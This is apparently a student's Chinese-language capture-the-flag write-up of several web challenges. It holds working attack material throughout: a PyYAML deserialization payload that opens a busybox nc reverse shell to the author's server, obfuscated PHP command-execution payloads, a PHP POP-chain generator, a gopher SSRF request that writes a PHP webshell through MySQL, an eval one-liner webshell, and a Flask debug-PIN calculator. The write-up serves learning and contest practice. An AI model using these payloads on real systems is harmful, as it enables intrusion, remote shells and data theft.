<!DOCTYPE root SYSTEM "http://vps/dns.dtd">
44
<root/>

[Week3] mysql管理工具#

先写正确思路：

观察登陆也网页html注释，发现低权限账号user/pass，登陆后拿到JWT，使用jwtcrack爆破。在macOS上编译jwtcrack有点费劲，不要用make，直接用gcc指定ssl位置。

1
gcc -o jwtcrack main.o base64.o \
2
  -L/opt/homebrew/opt/openssl@3/lib -lssl -lcrypto \
3
  -L/opt/homebrew/opt/ruby/lib -lpthread

1
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJleHAiOjE3NjA0NTQ4MDl9.kJvYL0phbK4dNL7PkEpiT7VmAvGQ7mZm18gXfW-7hnE
2
Secret is "Suam"

拿这个去https://www.bejson.com/jwt/#google_vignette把username改成admin，吧exp改长一点，Secret每个容器都是随机生成的。

拿新生成的JWT替换掉user权限的，进入sql测试页面。使用这个https://github.com/rmb122/rogue_mysql_server项目开启一个Rogue Mysql Server，file_list依次尝试

1
/etc/passwd 验证是否成功
2
/proc/self/environ  检查环境变量（本题没有收获）
3
/proc/self/cmdline  容器会写init指令
4
/home/ctf/app.py    呜呜呜呜
5

6
root@iZbp1d5rltw6uhsn58zuoaZ:~/rogue_mysql_server-v1.0.1-linux-amd64# cat loot/43.248.77.227/176045*
7
root:x:0:0:root:/root:/bin/sh
8
bin:x:1:1:bin:/bin:/sbin/nologin
9
daemon:x:2:2:daemon:/sbin:/sbin/nologin
10
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
11
sync:x:5:0:sync:/sbin:/bin/sync
12
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
13
halt:x:7:0:halt:/sbin:/sbin/halt
14
mail:x:8:12:mail:/var/mail:/sbin/nologin
15
news:x:9:13:news:/usr/lib/news:/sbin/nologin
16
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
17
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
18
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
19
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
20
games:x:35:35:games:/usr/games:/sbin/nologin
21
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
22
guest:x:405:100:guest:/dev/null:/sbin/nologin
23
nobody:x:65534:65534:nobody:/:/sbin/nologin
24
ctf:x:1000:1000::/home/ctf:/bin/sh
25

26
SHLVL=1HOME=/home/ctfPATH=/usr/local/bin:/usr/bin:/binPWD=/home/ctfpython-u/home/ctf/app.py
27

28
from flask import Flask, request, jsonify, render_template_string
29
import MySQLdb
30
import jwt
31
import random
32
import string
33
from functools import wraps
34
from datetime import datetime, timedelta
35
import yaml # pyyaml==5.1
36

37
app = Flask(__name__)
38
app.secret_key = ''.join(random.choices(string.ascii_letters + string.digits, k=4))
39

40
JWT_SECRET = ''.join(random.choices(string.ascii_letters + string.digits, k=4))
41
admin_pass = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
42
JWT_ALGORITHM = 'HS256'
43

44
USERS = {'admin': admin_pass,'user':'pass'}
45

46
def generate_token(username):
47
    payload = {'username': username, 'exp': datetime.utcnow() + timedelta(hours=24)}
48
    return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM)
49

50
def verify_token(token):
51
    try:
52
        payload = jwt.decode(token, JWT_SECRET, algorithms=[JWT_ALGORITHM])
53
        return payload['username']
54
    except Exception:
55
        return None
56

57
def login_required(f):
58
    @wraps(f)
59
    def wrapper(*args, **kwargs):
60
        token = request.headers.get('Authorization')
61
        if not token or not token.startswith('Bearer '):
62
            return jsonify({'error': 'Token missing'}), 401
63
        username = verify_token(token[7:])
64
        if not username:
65
            return jsonify({'error': 'Invalid token'}), 401
66
        request.current_user = username
67
        return f(*args, **kwargs)
68
    return wrapper
69

70
@app.route('/')
71
def index():
72
    return render_template_string('''
73
<!DOCTYPE html>
74
<html lang="zh-CN">
75
<head>
76
<meta charset="UTF-8">
77
<title>MySQL 登录</title>
78
<style>
79
body {font-family:sans-serif;background:linear-gradient(135deg,#667eea,#764ba2);display:flex;justify-content:center;align-items:center;height:100vh;margin:0;}
80
.login-container {background:white;padding:40px;border-radius:12px;box-shadow:0 10px 25px rgba(0,0,0,.1);width:360px;text-align:center;}
81
input{width:100%;padding:10px;margin:8px 0;border:1px solid #ccc;border-radius:6px;}
82
button{width:100%;padding:10px;background:#667eea;color:white;border:none;border-radius:6px;cursor:pointer;}
83
.error{color:#e74c3c;font-size:14px;}
84
.success{color:#27ae60;font-size:14px;}
85
</style>
86
</head>
87
<body>
88
<div class="login-container">
89
  <h2>🔐 MySQL 管理登录</h2>
90
  <form id="f">
91
    <input id="username" placeholder="用户名" required>
92
    <input id="password" type="password" placeholder="密码" required>
93
    <button type="submit">登录</button>
94
    <div id="msg"></div>
95
  </form>
96
</div>
97
<script>
98
document.getElementById('f').addEventListener('submit', async e=>{
99
  e.preventDefault();
100
  const res = await fetch('/login',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({
101
    username:username.value,password:password.value
102
  })});
103
  const data = await res.json();
104
  const msg=document.getElementById('msg');
105
  if(data.success){
106
    localStorage.setItem('token',data.token);
107
    msg.innerHTML='<div class="success">登录成功！</div>';
108
    setTimeout(()=>location.href='/test',1000);
109
  }else{
110
    msg.innerHTML='<div class="error">'+data.error+'</div>';
111
  }
112
});
113
</script>
114
</body>
115
<!-- user/pass --></html>
116
''')
117

118
@app.route('/login', methods=['POST'])
119
def login():
120
    data = request.get_json()
121
    username, password = data.get('username'), data.get('password')
122
    if username in USERS and USERS[username] == password:
123
        token = generate_token(username)
124
        return jsonify({'success': True, 'token': token})
125
    return jsonify({'success': False, 'error': '用户名或密码错误'})
126

127
@app.route('/test')
128
def mysql_test_page():
129
    return render_template_string('''
130
<!DOCTYPE html>
131
<html lang="zh-CN">
132
<head><meta charset="UTF-8"><title>MySQL 连接测试</title>
133
<style>
134
body{font-family:sans-serif;background:#f5f7fa;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;}
135
.container{background:white;padding:30px;border-radius:10px;box-shadow:0 2px 10px rgba(0,0,0,.1);width:360px;}
136
input{width:100%;padding:8px;margin-top:5px;border:1px solid #ccc;border-radius:5px;}
137
button{width:100%;padding:10px;margin-top:15px;background:#007bff;color:white;border:none;border-radius:5px;cursor:pointer;}
138
#out{margin-top:15px;font-family:monospace;white-space:pre-line;}
139
</style>
140
</head>
141
<body>
142
<div class="container">
143
<h3>🧩 测试 MySQL 连接</h3>
144
<form id="f">
145
  <input name="host" placeholder="Host" value="127.0.0.1">
146
  <input name="port" placeholder="Port" value="3306">
147
  <input name="user" placeholder="User" value="root">
148
  <input name="password" placeholder="Password" type="password">
149
  <input name="db" placeholder="Database" value="mysql">
150
  <button type="button" onclick="test()">测试连接</button>
151
</form>
152
<pre id="out"></pre>
153
</div>
154
<script>
155
const token = localStorage.getItem('token');
156
if(!token) location.href='/';
157
async function test(){
158
  const out=document.getElementById('out');
159
  out.textContent='正在测试...';
160
  let data=Object.fromEntries(new FormData(f).entries());
161
  try{
162
    let res=await fetch('/test_mysql',{method:'POST',headers:{
163
      'Content-Type':'application/json','Authorization':'Bearer '+token
164
    },body:JSON.stringify(data)});
165
    let j=await res.json();
166
    out.style.color=j.success?'green':'red';
167
    out.textContent=j.success?'连接成功！':'连接失败\\n'+(j.error||'');
168
  }catch(e){out.textContent='请求出错：'+e;}
169
}
170
</script>
171
</body></html>
172
''')
173

174
@app.route('/test_mysql', methods=['POST'])
175
@login_required
176
def test_mysql():
177
    if request.current_user != 'admin':
178
        return jsonify({"success": False, "error": "权限不足，只有 admin 可以测试 MySQL 连接"}), 403
179
    data = request.get_json() or {}
180
    for k in ("host", "port", "user", "password", "db"):
181
        if k not in data:
182
            return jsonify({"success": False, "error": f"缺少字段: {k}"})
183
    try:
184
        conn = MySQLdb.connect(
185
            host=data["host"],
186
            port=int(data["port"]),
187
            user=data["user"],
188
            passwd=data["password"],
189
            db=data["db"],
190
            connect_timeout=5,
191
            charset='utf8mb4',
192
            local_infile=1,
193
            ssl=None
194
        )
195
        cur = conn.cursor()
196
        cur.execute("SELECT 1")
197
        cur.close()
198
        conn.close()
199

200
        return jsonify({"success": True})
201
    except MySQLdb.Error as e:
202
        return jsonify({"success": False, "error": str(e)})
203
    except Exception as e:
204
        return jsonify({"success": False, "error": f"其他错误: {e}"})
205

206
@app.route('/uneed1t', methods=['GET'])
207
def uneed1t():
208
    data = request.args.get('data', '')
209
    if data == '':
210
        return jsonify({"result": "null"})
211
    try:
212

213
        black_list = [
214
            "system", "popen", "run", "os"
215
        ]
216

217
        for forb in black_list:
218
            if forb in data:
219
                return jsonify({"result":"error"})
220

221
        yaml.load(data, Loader=yaml.Loader)
222

223
        return jsonify({"result": "ok"})
224
    except Exception as e:
225
        return jsonify({"result":"error"})
226

227
if __name__ == "__main__":
228
    app.run(host="0.0.0.0", port=8000)

观察/uneed1t路由，存在yaml.Loader任意命令执行，有黑名单，使用subprocess.call。

1
!!python/object/apply:subprocess.call [['/bin/busybox','nc','vps的ip地址','nc监听端口','-e','/bin/sh']]

在vps上开个端口监听，准备接收反弹的shell

1
sudo nc -lvnp 80    # 懒的去vps服务商后台放行端口

1
ls /
2
cat fl1lag.txt

GooooD，二血。

弯路明天（今天）再写，他喵的，搞了三天。

弯路探索：

一开始有两种思路，sql inject、jwt，要搞到admin，然后后面是个命令拼接，“；”应该可以rce

尝试JWT改头HS256->None，改body，删签名，但invalid token，不会要hashmap吧？（这里就该尝试jwtcrack了，硬生生搞了一天半）

登陆进去后，以为是mysql-connector-java，尝试jdbc，屁用没有（报错信息一眼python。。。）

想覆盖socket，host置空，然后socket去读取flag

看学长blog发现pickle反序列化

上一天课了[表情]又试了ssti[表情]还试了mysql.connector的其他参数注入[表情]下一步可能尝试cookie投毒[表情]Rogue server应该还用不上吧[表情] （事实上rogue server是对的）

好的那就这样了。

[Week3] ezphp#

（未解出）

1
https://www.freebuf.com/articles/web/321769.html
2

3
PHP变量名由数字字母下划线组成，是没有.的 我从大佬的文章了解到，GET或POST方式传进去的变量名，会自动将空格 + . [转换为_。
4

5
有一种特殊情况，GET或POST方式传参时,变量名中的 [ 也会被替换为_,但其后的字符就再进行替换了
6
如 CTF[SHOW.COM => CTF_SHOW.COM
7

8

9
c1n[y0.u g3t+fl&g?=a
10
http://challenge.ilovectf.cn:30622/?c1n%5By0.u%20g3t%2Bfl%26g%3F=a
11

12
http://challenge.ilovectf.cn:30622/?c1n%5By0.u%20g3t%2Bfl%26g%3F=%93^%FF%8C^%FF%20%2F%3E%87^%FF
13

14

15
ls />abc
16

17
curl
18

19
%81^%FF=>~     %82^%FF=>}       %83^%FF=>|
20
%84^%FF=>{     %85^%FF=>z       %86^%FF=>y
21
%87^%FF=>x     %88^%FF=>w       %89^%FF=>v
22
%8A^%FF=>u     %8B^%FF=>t       %8C^%FF=>s
23
%8D^%FF=>r     %8E^%FF=>q       %8F^%FF=>p
24
%90^%FF=>o     %91^%FF=>n       %92^%FF=>m
25
%93^%FF=>l     %94^%FF=>k       %95^%FF=>j
26
%96^%FF=>i     %97^%FF=>h       %98^%FF=>g
27
%99^%FF=>f     %9A^%FF=>e       %9B^%FF=>d
28
%9C^%FF=>c     %9D^%FF=>b       %9E^%FF=>a
29
%9F^%FF=>`     %A0^%FF=>_       %A1^%FF=>^
30
%A2^%FF=>]     %A3^%FF=>\       %A4^%FF=>[
31
%A5^%FF=>Z     %A6^%FF=>Y       %A7^%FF=>X
32
%A8^%FF=>W     %A9^%FF=>V       %AA^%FF=>U
33
%AB^%FF=>T     %AC^%FF=>S       %AD^%FF=>R
34
%AE^%FF=>Q     %AF^%FF=>P       %B0^%FF=>O
35
%B1^%FF=>N     %B2^%FF=>M       %B3^%FF=>L
36
%B4^%FF=>K     %B5^%FF=>J       %B6^%FF=>I
37
%B7^%FF=>H     %B8^%FF=>G       %B9^%FF=>F
38
%BA^%FF=>E     %BB^%FF=>D       %BC^%FF=>C
39
%BD^%FF=>B     %BE^%FF=>A       %BF^%FF=>@
40
%C0^%FF=>?
41

42

43
http://challenge.ilovectf.cn:30622/?c1n%5By0.u%20g3t%2Bfl%26g%3F=(~%8F%97%8F%96%91%99%90)();
44

45
http://challenge.ilovectf.cn:30655/?c1n%5By0.u%20g3t%2Bfl%26g%3F=(~%8F%97%8F%96%91%99%90)();
46

47

48
%8F%97%8F%96%91%99%90
49

50
http://challenge.ilovectf.cn:30622/?c1n%5By0.u%20g3t%2Bfl%26g%3F=(~%93%8C%DF%D0%C1%DF%92%92)
51

52
system
53

54
exec
55
(~%9A%87%9A%9C)(~%93%8C);
56

57
exec >a
58
(~%9A%87%9A%9C)(~%C1%9E);
59

60
echo
61
(~%9A%9C%97%90)(~%C1%9E);
62

63
`$_GET[c]`
64
%9F%DB%A0%B8%BA%AB%A4%9C%A2%9F
65

66
`$_GET[c]`;
67
~%9F%DB%A0%B8%BA%AB%A4%9C%A2%9F%C4
68

69
(~%9F%DB%A0%B8%BA%AB%A4%9C%A2%9F);
70

71
(~%DB%A0%B8%BA%AB%A4%9C%A2);
72

73
exec($_GET[c])
74
%9A%87%9A%9C%D7%DB%A0%B8%BA%AB%A4%9C%A2%D6
75

76
>a
77
(~%C1%9E)
78

79
echo
80
%9A%9C%97%90
81

82

83
%C2%93%C2%8C%C3%9F%C3%92%C2%93%C2%9E
84

85
https://cloud.tencent.com/developer/article/2288274
86

87

88
curl -X POST "http://challenge.ilovectf.cn:30622/?c1n%5By0.u%20g3t%2Bfl%26g%3F=%DB%A0%AF%B0%AC%AB%A4%A0%A2" -d "_=readfile('flag.php');"
89

90
%DB%A0%B8%BA%AB%A4%A0%A2
91

92
?c1n%5By0.u%20g3t%2Bfl%26g%3F=(~%8C%86%8C%8B%9A%92)(~%93%8C);
93
system ls
94

95
http://challenge.ilovectf.cn:30655/?0='phpinfo();'&c1n%5By0.u%20g3t%2Bfl%26g%3F=(~%DB%A0%B8%BA%AB%A4%CF%A2)();
96

97

98
http://challenge.ilovectf.cn:30750/?c1n%5By0.u%20g3t%2Bfl%26g%3F=$_=~%8f%97%8c%8c%9a%92;$_();
99

100
eval($_GET['_'])
101

102

103
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
104

105
${(~%A0%B8%BA%AB)}[%21]();&%21=phpinfo
106

107

108
${~%A0%B8%BA%AB}{_}();&_=phpinfo
109

110

111
${~%A0%B8%BA%AB}{_};&_=phpinfo();
112

113
${~%A0%B8%BA%AB}{_};&_=phpinfo();
114

115

116
${~%A0%B8%BA%AB}{_}(${~%A0%B8%BA%AB}{__});&_=system&__=ls
117

118
?_[0]=system&_[1]=ls%20-la
119

120
${~%A0%B8%BA%AB};&_[0]=system&_[1]=>a
121

122
`{${~%A0%B8%BA%AB}[_]}`;&_=>a
123

124
`${~%A0%B8%BA%AB}[_]`;&_=>a
125

126
`{${~%A0%B8%BA%AB}[_]}`;&_=>a       16字符
127

128
_GET[_]
129
%A0%B8%BA%AB%A4%A0%A2
130
`${~%A0%B8%BA%AB%A4%A0%A2}`;&_=>a
131

132
$_GET[_]
133
%DB%A0%B8%BA%AB%A4%A0%A2
134
`{~%DB%A0%B8%BA%AB%A4%A0%A2}`;&_=>a
135

136
a=`${~%A0%B8%BA%AB[_]}`;&_=>a       16字符
137

138
`{$_GET[_]}`;
139

140
${~%A0%B8%BA%AB}[_];&_=>a
141

142
${${~%A0%B8%BA%AB}[_]};&_=>a
143

144

145
`(~%C1%9E)`
146

147
`~%9C%86`;
148

149

150
`${_}`;&_=>a
151

152
$_=`${_}`;&_=>a
153

154
`$_GET[_]`&_=ls

[Week4] Path to Hero#

PHP反序列化POP链，最终需要利用Treasure 类里的 eval() 函数

unserialize() → Start::__wakeup() → Sword::__get() → Mon3tr::__toString() → Treasure::__call() → eval()

看不懂思密达，交给ai分析一下：

1
原理与绕过
2

3
入口: 反序列化一个Start对象触发__wakeup。设置$ishero为包含"hero"但不等于"hero"的字符串即可进入利用链。
4

5
跳转到Sword: 在Start对象中，将$adventure属性设置为一个Sword对象。访问其不存在的sword属性，自动触发Sword的__get方法。
6

7
MD5绕过: 在Sword对象中，为满足md5($a) == md5($b)的弱类型比较，给$test1和$test2赋两个MD5哈希值以"0e"开头的不同字符串。
8

9
跳转到Mon3tr: 在Sword对象中，将$go属性设置为一个Mon3tr对象。echo该对象时，自动触发Mon3tr的__toString方法。
10

11
黑名单绕过与RCE: 在Mon3tr对象中，$end属性即为最终要执行的代码。为绕过preg_match对"flag"等关键字的检测，不能直接写readfile('/flag')。
12

13
Payload: 使用 readfile(glob("/*")[0]); 或 readfile(base64_decode('L2ZsYWc=')); 这样的方式构造命令，即可在不出现关键字的情况下读取/flag文件。
14

15
最终，将构造好的Start对象序列化后提交，即可触发整条链，成功执行代码。

1
<?php
2

3
class Start {
4
    public $ishero;
5
    public $adventure;
6
}
7

8
class Sword {
9
    public $test1;
10
    public $test2;
11
    public $go;
12
}
13

14
class Mon3tr {
15
    // private $result;  // 在构造 payload 时不需要关心私有属性
16
    public $end;
17
}
18

19
class Treasure {
20
    // 无需实例化，在链中自动创建
21
}
22

23
// 1. 创建最终执行命令的 Mon3tr 对象
24
$monster = new Mon3tr();
25
// Payload: 先用 scandir 看一下当前目录有什么文件
26
//$monster->end = "print_r(scandir('/'));";
27
// 尝试读取 flag:
28
$monster->end = "readfile(base64_decode('L2ZsYWc='));";
29

30
// 2. 创建 Sword 对象
31
$sword = new Sword();
32
$sword->test1 = "s878926199a";
33
$sword->test2 = "s155964671a";
34
$sword->go = $monster; // 链接到 Mon3tr 对象
35

36
// 3. 创建入口 Start 对象
37
$start = new Start();
38
$start->ishero = "superhero"; // 绕过 hero 检查
39
$start->adventure = $sword; // 链接到 Sword 对象
40

41
// 4. 序列化并输出 payload
42
$payload = serialize($start);
43
echo urlencode($payload);
44

45
?>

使用$monster->end = "print_r(scandir('/'));"; 可以列出/下的目录

1
</code><br>勇者啊，去寻找利刃吧<br>沉睡的利刃被你唤醒了，是时候去讨伐魔王了！<br>到此为止了！魔王<br>结束了？<br>Array
2
(
3
    [0] => .
4
    [1] => ..
5
    [2] => .dockerenv
6
    [3] => bin
7
    [4] => dev
8
    [5] => etc
9
    [6] => flag
10
    [7] => home
11
    [8] => init.sh
12
    [9] => lib
13
    [10] => media
14
    [11] => mnt
15
    [12] => proc
16
    [13] => root
17
    [14] => run
18
    [15] => sbin
19
    [16] => srv
20
    [17] => sys
21
    [18] => tmp
22
    [19] => usr
23
    [20] => var
24
)
25
<br>

1
(base) ➜ php gen_payload.php
2
O%3A5%3A%22Start%22%3A2%3A%7Bs%3A6%3A%22ishero%22%3Bs%3A9%3A%22superhero%22%3Bs%3A9%3A%22adventure%22%3BO%3A5%3A%22Sword%22%3A3%3A%7Bs%3A5%3A%22test1%22%3Bs%3A11%3A%22s878926199a%22%3Bs%3A5%3A%22test2%22%3Bs%3A11%3A%22s155964671a%22%3Bs%3A2%3A%22go%22%3BO%3A6%3A%22Mon3tr%22%3A1%3A%7Bs%3A3%3A%22end%22%3Bs%3A36%3A%22readfile%28base64_decode%28%27L2ZsYWc%3D%27%29%29%3B%22%3B%7D%7D%7D%
3
(base) ➜ curl -X POST -d "HERO=O%3A5%3A%22Start%22%3A2%3A%7Bs%3A6%3A%22ishero%22%3Bs%3A9%3A%22superhero%22%3Bs%3A9%3A%22adventure%22%3BO%3A5%3A%22Sword%22%3A3%3A%7Bs%3A5%3A%22test1%22%3Bs%3A11%3A%22s878926199a%22%3Bs%3A5%3A%22test2%22%3Bs%3A11%3A%22s155964671a%22%3Bs%3A2%3A%22go%22%3BO%3A6%3A%22Mon3tr%22%3A1%3A%7Bs%3A3%3A%22end%22%3Bs%3A36%3A%22readfile%28base64_decode%28%27L2ZsYWc%3D%27%29%29%3B%22%3B%7D%7D%7D" http://challenge.ilovectf.cn:30147/index.php
4

5
(省略html...)
6
</code><br>勇者啊，去寻找利刃吧<br>沉睡的利刃被你唤醒了，是时候去讨伐魔王了！<br>到此为止了！魔王<br>结束了？<br>flag{da7e7519-a83f-4e8a-86bc-751e44439d35}<br>%

[Week4] android or apple#

施工区域⚠️

1
curl http://challenge.ilovectf.cn:30345/verify.php -H "X-VERIFY-CODE-URL: http://120.26.146.96"
2

3
(base) ➜  ~ curl challenge.ilovectf.cn:30489/verify.php -H "X-VERIFY-CODE-URL: dict://120.26.146.96:80/helo:dict"
4
<p>本次登录的验证码为：</p><img src="./images/2163fd445aa83a43ef4dc9b40097725a.bin" alt="Verification Code"/>%
5
(base) ➜  ~ curl challenge.ilovectf.cn:30489/verify.php -H "X-VERIFY-CODE-URL: gopher://120.26.146.96:80/helo:gopher"
6

7
<?php @eval($_GET['a']) ?>
8

9
http://challenge.ilovectf.cn:30489/composer.json
10
http://challenge.ilovectf.cn:30489/composer.lock
11

12
[14:30:35] 200 -    8KB - /www.zip
13
他喵的这才是真的src
14

15
http://challenge.ilovectf.cn:30489/images/a16928e3e14ede05b2eab5b54e67fb2f.bin
16

17
(base) ➜  ~ curl challenge.ilovectf.cn:30489/verify.php \
18
  -H "X-VERIFY-CODE-URL: gopher://127.0.0.1:3306"
19
(base) ➜  ~ curl "http://challenge.ilovectf.cn:30489/images/181dd1f033da1992bfe13f1ba8f94510.bin"
20

21
[���
22
5.7.42-0ubuntu0.18.04.1����?c=@Ba�ÿÿ�ÿÁ����������,XUi}1z;/5�mysql_native_password�
23

24

25
curl challenge.ilovectf.cn:30489/verify.php \
26
  -H "X-VERIFY-CODE-URL: gopher://127.0.0.1:3306/_%a3%00%00%01%85%a2%1a%00%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%57%00%00%00%03%53%45%4c%45%43%54%20%27%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%39%38%38%32%32%5f%52%45%51%55%45%53%54%5b%27%63%6d%64%27%5d%29%3b%20%3f%3e%27%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%73%68%65%6c%6c%2e%70%68%70%27%01%00%00%00%01"
27

28
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a2%1a%00%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%57%00%00%00%03%53%45%4c%45%43%54%20%27%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%39%38%38%32%32%5f%52%45%51%55%45%53%54%5b%27%63%6d%64%27%5d%29%3b%20%3f%3e%27%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%73%68%65%6c%6c%2e%70%68%70%27%01%00%00%00%01

[Week4] 来getshell 速度!#

[Week4] 好像什么都能读#

提示：不会告诉你可能要算些什么(bushi。

那么很明显，要算flask的debug pin了，读取以下文件：

1
/home/ctf/app/app.py
2
成功：app.py 的内容
3
from flask import Flask, request, render_template
4

5
app = Flask(__name__)
6

7
@app.route('/')
8
def hello_world():
9
    return render_template('index.html')
10

11
@app.route('/read')
12
def read():
13
    # 获取请求参数中的文件名
14
    filename = request.args.get('filename')
15
    if not filename:
16
        return "需要提供文件名", 400
17
    with open(filename, 'r') as file:
18
            content = file.read()
19
    return content, 200
20

21
if __name__ == '__main__':
22
    app.run(host='0.0.0.0', port=5000, debug=True)
23

24
运行用户
25
ctf
26

27
成功：/sys/class/net/eth0/address 的内容
28
26:c5:81:cb:dc:78
29

30
成功：/proc/sys/kernel/random/boot_id 的内容
31
89b34b88-6f33-4c4b-8a30-69a4ba41fd0e
32

33
成功：/proc/self/cgroup 的内容
34
0::/

用不知道哪个博客抄来的奇妙小脚本算出pin：

1
import hashlib
2
from itertools import chain
3

4

5
def mac_10():
6
    """
7
    /sys/class/net/eth0/address mac地址十进制
8
    :return:
9
    """
10
    mac_address = "26:c5:81:cb:dc:78"
11
    # 将MAC地址视为一个十六进制数（去掉冒号）
12
    value = int(mac_address.replace(":", ""), 16)
13
    return str(value)
14

15

16
probably_public_bits = [
17
    'ctf'  # username
18
    'flask.app',  # modname
19
    'Flask',  # appname
20
    '/home/ctf/.local/lib/python3.13/site-packages/flask/app.py'  # moddir
21
]
22

23
machine_id = ''
24
boot_id = '89b34b88-6f33-4c4b-8a30-69a4ba41fd0e'
25
c_group = '0::/'
26

27
id = ''
28
if machine_id:
29
    id += machine_id.strip()
30
else:
31
    id += boot_id.strip()
32
id += c_group.strip().rpartition('/')[2]
33

34
private_bits = [
35
    mac_10(),  # mac地址
36
    id  #machin-id
37
]
38

39
h = hashlib.sha1()
40
for bit in chain(probably_public_bits, private_bits):
41
    if not bit:
42
        continue
43
    if isinstance(bit, str):
44
        bit = bit.encode("utf-8")
45
    h.update(bit)
46
h.update(b"cookiesalt")
47

48
cookie_name = f"__wzd{h.hexdigest()[:20]}"
49

50
# If we need to generate a pin we salt it a bit more so that we don't
51
# end up with the same value and generate out 9 digits
52
num = None
53
if num is None:
54
    h.update(b"pinsalt")
55
    num = f"{int(h.hexdigest(), 16):09d}"[:9]
56

57
# Format the pincode in groups of digits for easier remembering if
58
# we don't have a result yet.
59
rv = None
60
if rv is None:
61
    for group_size in 5, 4, 3:
62
        if len(num) % group_size == 0:
63
            rv = "-".join(
64
                num[x: x + group_size].rjust(group_size, "0")
65
                for x in range(0, len(num), group_size)
66
            )
67
            break
68
    else:
69
        rv = num
70

71
print(rv)
72
# 145-175-537

然后随便导致一个报错**http://challenge.ilovectf.cn:30029/read?filename=a**，点击console按钮就可以啦，wait，为什么没有console按钮？！

这个其实我之前玩flask的时候就被坑过，当时在树莓派上部署flask，电脑根本打不开debug console，因为需要本地请求。（我看好多博客都没写啊，他们难道用的都是旧版本？）那么思路很清晰，就是修改请求头Host为127.0.0.1，但我搞了一上午😓，最后发现是路由器丢包，js没传过来，而且加载巨慢，一度怀疑是不是本地回环了💦。结果换成热点立马好了。。。也算长了点教训。

flask_debug_console

还有还有，一开始用Reqable添加Header，导致实际上有两个Host，也坑了半天。。。

[Week4] 这又又是什么函数#